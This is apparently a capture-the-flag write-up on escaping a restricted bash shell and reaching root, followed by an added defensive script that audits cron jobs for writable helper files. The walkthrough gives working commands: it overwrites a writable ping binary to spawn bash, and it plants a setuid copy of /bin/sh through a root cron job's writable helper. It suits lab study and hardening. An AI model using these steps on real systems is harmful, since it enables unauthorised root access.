I connected to the system over SSH with restricted1. After login I found I was in a restricted bash shell (rbash).
I found that several commands were not allowed, and the / character was allowed in arguments but not in the command name.
So I couldn't call any commands by path.
So I used the command below to check the files and their permissions.
ls -la ./bin
I found that I had write permission on the ping file.
And why is there a tee command? (It's a hint.)
So I used the tee command to write bash into ping using the commands below.
echo '#!' | tee ./bin/ping
echo '/bin/bash' | tee -a ./bin/ping
Then I ran the ping command and escaped from the restricted shell.
I am no longer in a restricted shell.
I set my ENV path so I don't have to specify full paths to programs:
export PATH=$PATH:/bin
export PATH=$PATH:/usr/bin
After performing lots of vulnerability tests I found that there was a cron job running, so I switched to
cd /etc/cron.minutely/mtr
The file had no write permission, but after checking the file using
cat /etc/cron.minutely/mtr
I saw that the file was including another file from
/usr/bin/mtr-check
and I had write permission on it. To check, I ran
ls -la /usr/bin/mtr-check
So I altered the content with the code below, using the nano editor.
cp /bin/sh /home/restricted1/ud64 && chmod 4755 /home/restricted1/ud64
Cron will copy /bin/sh to my directory (restricted1) and set the s flag using chmod 4755 (so I had setuid upon execution).
When I switched to /home/restricted1, I found ud64. After running
./ud64
I got root. To check, I ran
whoami
and finally, to read the content, I used the line below,
cat /root/secret.txt
I hope this tutorial helps you understand the security risk associated with improper file permissions.
Thanks.. :) ./unknowndevice64
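The root cause in this walkthrough is a root-run cron job calling a helper file that an unprivileged user could modify. As an added example, not part of the original post: a shell audit that flags cron jobs, and files they reference by absolute path, that are writable by group or other. The function names and output labels are assumptions made for this example.

```shell
#!/bin/sh
# Added audit example (not from the original write-up).
# Usage (assumed): sh audit.sh /etc/cron.minutely /etc/cron.d ...

# True if $1 is a regular file writable by group or other.
# -H follows a symlink given on the command line, so the target's
# mode is tested rather than the link's own lrwxrwxrwx.
is_loosely_writable() {
    [ -n "$(find -H "$1" -prune -type f \
        \( -perm -0020 -o -perm -0002 \) -print 2>/dev/null)" ]
}

# audit_cron_dir DIR: print one finding per line.
audit_cron_dir() {
    dir=$1
    for script in "$dir"/*; do
        [ -f "$script" ] || continue
        # The job file itself must not be editable by non-owners.
        if is_loosely_writable "$script"; then
            echo "WRITABLE-JOB $script"
        fi
        # Every absolute path mentioned in the job is a candidate helper
        # that will run with the job's privileges.
        grep -oE '/[A-Za-z0-9_./-]+' "$script" | sort -u |
        while read -r ref; do
            if is_loosely_writable "$ref"; then
                echo "WRITABLE-HELPER $ref (called from $script)"
            fi
        done
    done
}

# Audit each directory named on the command line.
for d in "$@"; do
    audit_cron_dir "$d"
done
```

A finding is fixed by making the helper owned by root and removing group and other write access, for example mode 0755.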